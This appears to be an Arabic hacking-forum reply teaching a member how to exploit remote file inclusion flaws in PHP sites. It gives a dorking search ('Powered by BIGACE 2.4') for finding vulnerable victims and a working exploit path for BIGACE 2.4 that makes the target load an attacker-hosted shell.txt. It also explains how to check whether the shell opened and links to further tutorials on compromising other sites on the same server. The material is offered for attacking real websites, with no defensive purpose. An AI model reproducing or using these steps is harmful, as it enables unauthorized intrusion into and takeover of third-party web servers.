ياهلا اخوي
انت تنسخت الرابط ونقصت منه
ثغرات الانكلود الان الصبحة قليله
لاكن بوضحها لك
New Threats - Home
نفرض
ان الثغره هنا
الملف المصاب min.php
المتغير star الي هو مسبب الثغره
الان بعد علمة = تضيف رابط الشل
راح يصير بهذا الشكل
http://www.xxxx.com/media/min.php?st...ost/shell.txt?
اذا فتح لك الشل يعني مصاب مافتح يعني مو مصاب
مثال ثاني
هذي ثغره فايل انكلود
http://www.milw0rm.com/exploits/5596
السكربت المصاب
BIGACE 2.4
تروح قوقل وتكتب
"Powered by BIGACE 2.4"
يطلعون لك المواقع الي مركبه السكربت
عاده رابط السكربت ينتهي كذا
http://localhost/bigace
مجلد السكربت bigace
تضيف خلفه الاستثمار مع تغير رابط الشل
addon/smarty/plugins/function.captcha.php?GLOBALS[_BIGACE][DIR][addon]=http://localhost/shell.txt?
وهذا شرح بصوره لثغره لاكن قديمه المهم ناخذ شرح الاستثمار
http://www.alm3refh.com/vb/t3742.html (شرح ثغرة الدعم الفني + اختراق المواقع الي على السرفر)
وهذي مواضيع تفيدك
http://www.alm3refh.com/vb/t3894.html (ماذا افعل بروابط الثغرات وكيفية الاستفادة بها)
http://www.alm3refh.com/vb/t3.html (شرح البحث عن الثغرات وطريقة الاستثمار)